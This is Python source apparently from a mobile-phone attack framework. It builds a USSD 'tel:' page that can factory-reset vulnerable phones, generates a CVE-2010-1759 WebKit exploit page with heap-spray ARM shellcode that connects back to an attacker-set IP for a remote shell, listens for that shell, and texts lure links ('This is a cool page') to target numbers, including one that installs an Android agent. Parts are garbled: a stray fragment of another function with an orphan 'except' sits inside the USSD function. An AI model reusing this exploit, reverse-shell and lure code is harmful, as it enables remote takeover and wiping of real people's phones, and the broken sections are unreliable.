def delivery(key, command, deliverymethod, returnmethod, control, explicit=False):
    global webroot

    if returnmethod == "HTTP":
        returnmethod = ""

    if control == "" or control == None:
        control = webroot + "spf/putfunc"

    if explicit == False:
        command = "%s %s %s %s" % (key, command, deliverymethod, returnmethod)

        if returnmethod == "SMS":
            modem = get_modem()

            if modem == 0:
                print "\n[!] No modems found. Attach a modem to use this functionality\n"
                return 1

            else:
                command += modem + "\n"

        elif returnmethod == "":
            command += "\n"

    file = open(control, "w")
    file.write(command)
    file.close()

    return 0
def send_sms(key):
    print color(
        35,
        "\n[*] Send an SMS message to another phone. Fill in the number, the message to send, and the delivery method.\n",
    )
    sendnumber = str(raw_input(color(33, "[-] Number: ")))
    sendmessage = str(raw_input(color(33, "[-] Message: ")))
    deliverymethod = str(raw_input(color(33, "[-] Delivery Method(SMS or HTTP): ")))

    if deliverymethod is "HTTP":
        command = "%s SPAM none %s %s %s\n" % (key, deliverymethod, sendnumber, sendmessage)

    if deliverymethod is "SMS":
        modem = get_modem()
        if modem is 0:
            print color(31, "\n[!] No modems found. Attach a modem to use this functionality\n")
        else:
            command = "%s SPAM %s %s %s %s\n" % (key, modem, deliverymethod, sendnumber, sendmessage)

    x = delivery(key=key, command=command, explicit=True)
    return x
def ussd(ussd=None):
    webroot   = config.get('Web', 'webroot')
    ipaddress = config.get('Web', 'ipaddress')

    if ussd == None:
        ussd = "*2767*3855%23"

    print ''
    print color(31, "[!] WARNING: THIS CAN FACTORY RESET YOUR PHONE IF VULNERABLE.")
    print color(31, "[ ] FOR PROOF OF CONCEPT USE ONLY!")
    print color(31, "[ ] USE THE SAFE VERSION ON PENTESTS")
    print ''

    path     = str(raw_input(color(33, "[-] Hosting Path (%s+input): " % webroot)))
    filename = str(raw_input(color(33, "[-] Filename: "              )))
    number   = str(raw_input(color(33, "[-] Phone Number to Attack: ")))

    if path[0] != '/':
        path = '/'+path

    if filename[0] != '/':
        filename = '/'+filename

    link     = "http://"+ipaddress+path+filename

    fullpath = webroot+path
    command1 = "mkdir "+fullpath
    system(command1)

    sploitfile = fullpath+filename
    command8 = "touch "+sploitfile
    system(command8)

    command9 = "chmod 777 "+sploitfile
    system(command9)

    # File modification here
    sploit2  = "/redirect.html"
    sploitfile2 = fullpath+sploit2
    text = ['<html>\n',
            '\t<head>\n',
            '\t\t<meta http-equiv="refresh" content="1;url=http://'+ipaddress+path+sploit2+'">\n',
            '\t</head>\n',
            '\t<frameset>\n',
            '\t\t<frame src="tel:'+ussd+'" />\n',
            '\t</frameset>\n',
            '</html>\n'
           ]

    file = open(sploitfile, 'w')
    file.writelines(text)
    file.close()

    command8 = "touch "+sploitfile2
    system(command8)

    command9 = "chmod 777 "+sploitfile2
    system(command9)

    text2 = ['<html>\n',
             '\t<frameset>\n',
             '\t\t<frame src="tel:'+ussd+'" />\n',
             '\t</frameset>\n',
             '</html>\n'
            ]

    file = open(sploitfile2, 'w')
    file.writelines(text2)
    file.close()

    modem = get_modem()
    if modem == 0:
        print color(31, '\n[!] No modems found. Attach a modem to use this functionality\n')
        return 0
    cursor = db.cursor()

    pathquery      = 'SELECT %s from modems where id=%s' % ('path', modem)
    cursor.execute(pathquery)
    results        = cursor.fetchall()
    path2          = results[0]

    keyquery       = 'SELECT %s from modems where id=%s' % ('controlkey', modem)
    cursor.execute(keyquery)
    results        = cursor.fetchall()
    key2           = results[0]

    modemtypequery = 'SELECT %s from modems where id=%s' % ('type', modem)
    cursor.execute(modemtypequery)
    results        = cursor.fetchall()
    modemtype2     = results[0]

    if modemtype2 == 'usb':
        try:
            usb = serial.serialposix(port='/dev/ttyUSB2', baudrate=115200, bytesize=8, parity='N', stopbits=1)
            usb.write('ATZ\r\n')
            sleep(1)

            line = read_modem(usb)
            print line
            sleep(1)

            usb.write('AT+CMGF=1\r\n')
            line = read_modem(usb)
            print line
            sleep(1)

            numberline = 'AT+CMGS="%s"\r\n' % number
            usb.write(numberline)
            line = read_modem(usb)
            print line
            sleep(1)

            msg = 'This is a cool page: %s' % link
            usb.write(struct.pack('b',26, msg))
            sleep(2)

            line = read_modem(usb)
            print line
            sleep(1)

            usb.close()
                
            print color(32, '[+] Data sent!')
            return 0
        except Exception, e:
            print color(31, '[!] Error: %s' % e)
            x = ussd()
            return x
        returnmethod = returnmethod.lower()
    except Exception, e:
        print color(31, '[!] Error: %s' % e)
        return 1

    if returnmethod is 'http':
        returnmethod = ''

    if control in ('', None):
        control = webroot + 'spf/putfunc'

    if explicit is False:
        command = '%s %s %s %s' % (key, command, deliverymethod, returnmethod)   

        if returnmethod is 'sms':
            modem = get_modem()

            if modem is 0:
                print color(31, '\n[!] No modems found. Attach a modem to use this functionality\n')
                # Exit here to prevent writing to file
                return 1
            else:
                command += modem + '\n'

        elif returnmethod is '':
            command += '\n'

    file = open(control, 'w')
    file.write(command)
    file.close()
def client_side():
    # TODO: fix a lot
    webserver = config.get("Web", "server")
    # ipaddress      = config.get('Web', 'ipaddress')
    shellipaddress = config.get("Web", "shellipaddress")

    cs = ["CVE 2010-1759 Webkit Vuln Android"]

    choice = menu(cs)

    if choice in (0, "Error"):
        return 0

    elif choice == 1:
        path = str(raw_input(color(33, "[-] Hosting Path: ")))
        filename = str(raw_input(color(33, "[-] Filename: ")))
        ipaddress = str(raw_input(color(33, "[-] Local IP address: ")))
        number = str(raw_input(color(33, "[-] Phone Number to Attack: ")))

        link = "http://%s%s%s" % (ipaddress, path, filename)

        fullpath = webserver + path
        command1 = "mkdir %s" % fullpath
        system(command1)

        octets = shellipaddress.split(".")

        out1 = struct.pack("b", int(octets[0]))
        hex1 = hex(out1)

        out2 = struct.pack("b", int(octets[1]))
        hex2 = hex(out2)

        out3 = struct.pack("b", int(octets[2]))
        hex3 = hex(out3)

        out4 = struct.pack("b", int(octets[3]))
        hex4 = hex(out4)

        sploitfile = "%s%s" % (fullpath, filename)
        command8 = "touch %s" % sploitfile
        system(command8)

        command9 = "chmod 777 %s" % sploitfile
        system(command9)

        file = open(sploitfile, "w")
        text = [
            "<html>\n",
            "<head>\n",
            "<script>\n",
            'var ip = unescape("\\u' + hex2 + hex1 + "\\u" + hex4 + hex3 + '");\n',
            'var port = unescape("\\u3930");\n',
            "function trigger()\n",
            "{\n",
            'var span = document.createElement("div");\n',
            'document.getElementById("BodyID").appendChild(span);\n',
            'span.innerHTML = -parseFloat("NAN(ffffe00572c60)");\n',
            "}\n",
            "function exploit()\n",
            "{\n",
            'var nop = unescape("\\u33bc\\u0057");\n',
            "do\n",
            "{\n",
            "nop+=nop;\n",
            "} while (nop.length<=0x1000);\n",
            'var scode = nop+unescape("\\u1001\\ue1a0\\u0002\\ue3a0\\u1001\\ue3a0\\u2005\\ue281\\u708c\\ue3a0\\u708d\\ue287\\u0080\\uef00\\u6000\\ue1a0\\u1084\\ue28f\\u2010\\ue3a0\\u708d\\ue3a0\\u708e\\ue287\\u0080\\uef00\\u0006\\ue1a0\\u1000\\ue3a0\\u703f\\ue3a0\\u0080\\uef00\\u0006\\ue1a0\\u1001\\ue3a0\\u703f\\ue3a0\\u0080\\uef00\\u0006\\ue1a0\\u1002\\ue3a0\\u703f\\ue3a0\\u0080\\uef00\\u2001\\ue28f\\uff12\\ue12f\\u4040\\u2717\\udf80\\ua005\\ua508\\u4076\\u602e\\u1b6d\\ub420\\ub401\\u4669\\u4052\\u270b\\udf80\\u2f2f\\u732f\\u7379\\u6574\\u2f6d\\u6962\\u2f6e\\u6873\\u2000\\u2000\\u2000\\u2000\\u2000\\u2000\\u2000\\u2000\\u2000\\u2000\\u0002");\n',
            "scode += port;\n",
            "scode += ip;\n",
            'scode += unescape("\\u2000\\u2000");\n',
            "target = new Array();\n",
            "for(i = 0; i < 0x1000; i++)\n",
            "target[i] = scode;\n",
            "for (i = 0; i <= 0x1000; i++)\n",
            "{\n",
            'document.write(target[i]+"<i>");\n',
            "if (i>0x999)\n",
            "{\n",
            "trigger();\n",
            "}\n",
            "}\n",
            "}\n",
            "</script>\n",
            "</head>\n",
            '<body id="BodyID">\n',
            "Enjoy!\n",
            "<script>\n",
            "exploit();\n",
            "</script>\n",
            "</body>\n",
            "</html>\n",
        ]
        file.writelines(text)
        file.close()

        modem = get_modem()
        if modem == 0:
            print color(31, "\n[!] No modems found. Attach a modem to use this functionality\n")
            return 1

        # Read SQL vars from config
        sqlserver = config.get("SQL", "server")
        username = config.get("SQL", "username")
        password = config.get("SQL", "password")

        db = MySQLdb.connect(sqlserver, username, password, "framework")

        pathquery = "SELECT %s from modems where id=%s" % ("path", modem)
        path2 = db_exec_rows(pathquery)

        keyquery = "SELECT %s from modems where id=%s" % ("controlkey", modem)
        key2 = db_exec_rows(keyquery)

        modemtypequery = "SELECT %s from modems where id=%s" % ("type", modem)
        modemtype2 = db_exec_rows(modemtypequery)

        if modemtype2 == "usb":
            # Interface with USB modem
            usb = serial.serialposix(port="/dev/ttyUSB2", baudrate=115200, bytesize=8, parity="N", stopbits=1)
            usb.write("ATZ\r\n")
            sleep(1)

            line = read_modem(usb)
            print line
            sleep(1)

            usb.write("AT+CMGF=1\r\n")
            line = read_modem(usb)
            print line
            sleep(1)

            numberline = 'AT+CMGS="%s"\r\n' % number
            usb.write(numberline)
            line = read_modem(usb)
            print line
            sleep(1)

            msg = "This is a cool page: %s" % link
            usb.write(struct.pack("b", 26, msg))
            sleep(2)

            line = read_modem(usb)
            print line
            sleep(1)

            usb.close()

        elif modemtype2 == "app":
            # Interface with app-based modem
            control = "%s%s/getfunc" % (webserver, path2)
            command2 = "%s SEND %s This is a cool page: %s" % (key2, number, link)

            file = open(control, "w")
            file.write(command2)
            file.close()

        vulnerable = "no"

        # socket = new IO::Socket::INET (LocalHost => $shellipaddress, LocalPort => '12345', Proto => 'tcp' , Listen => 1, Reuse => 1, Timeout=> 180);
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.bind((str(shellipaddress), 12345))

        if data_socket == socket.accept():
            data = "/system/bin/id\n"

            data_socket.write(data)
            data = data_socket()

            print data
            close(data_socket)

            vulnerable = "yes"
            print color(32, "\n[+] Vulnerable: %s\n" % vulnerable)

            table = "client"
            global db

            number2 = '"%s"' % number
            vulnerable2 = '"%s"' % vulnerable
            webkit = '"webkit"'
            insertquery = "INSERT INTO %s (id,number,exploit,vuln) VALUES (DEFAULT,%s,%s,%s)" % (
                table,
                number2,
                webkit,
                vulnerable2,
            )
            cursor = db.cursor()
            sql = cursor.execute(insertquery)
        return 0

    return 1
def direct_download():
    #TODO: cleanup
    webserver = config.get('Web', 'server')
    ipaddress = config.get('Web', 'ipaddress')

    print color(35, '[*] This module sends an SMS with a link to directly download and install an Agent\n')
    print color(31, '[!] ONLY Android currently Supported')

    #platform = str(raw_input('Platform(Android/iPhone/Blackberry): '))
    platform = 'android'

    # Lots of potential for error with the way this is handled, would
    # prefer safer execution
    path     = str(raw_input(color(33, '[-] Hosting Path: '          )))
    filename = str(raw_input(color(33, '[-] Filename: '              )))
    number   = str(raw_input(color(33, '[-] Phone Number to Attack: ')))

    if platform.lower() == 'android':
        link = 'http://%s%s%s' % (ipaddress, path, filename)
        fullpath = '%s%s' % (webserver, path)
        command1 = 'mkdir %s' % fullpath
        system(command1)

        global location # Android agent location
        command = 'cp %s %s%s%s'% (location, webserver, path, filename)
        system(command)

        modem = get_modem()
        if modem == 0:
            print color(31, '\n[!] No modems found. Attach a modem to use this functionality\n')
            return 0
        else:
            pathquery      = "SELECT %s from modems where id=%s" % ('path', modem)
            path2          = db_exec_rows(pathquery)

            keyquery       = "SELECT %s from modems where id=%s" % ('controlkey', modem)
            key2           = db_exec_rows(keyquery)

            modemtypequery = "SELECT %s from modems where id=%s" % ('type', modem)
            modemtype2     = db_exec_rows(modemtypequery)

            if modemtype2 == 'usb':
                usb = serial.serialposix(port='/dev/ttyUSB2', baudrate=115200, bytesize=8, parity='N', stopbits=1)
                usb.write('ATZ\r\n')
                sleep(1)

                line = read_modem(usb)
                print line
                sleep(1)

                usb.write('AT+CMGF=1\r\n')
                line = read_modem(usb)
                print line
		sleep(1)

                numberline = 'AT+CMGS="%s"\r\n' % number
                usb.write(numberline)
                line = read_modem(usb)
                print line
                sleep(1)

                msg = 'This is a cool app: %s' % link
                usb.write(struct.pack('b', 26, msg))
                sleep(5)

                line = read_modem(usb)
                print line
                sleep(1)

                usb.close()

            elif modemtype2 == 'app':
                control  = '%s%s/getfunc' % (webserver, path2)
                command2 = '%s SEND %s This is a cool app: %s' % (key2, number, link)

                file = open(control, 'w')
                file.write(command2)
                file.close()
    return 0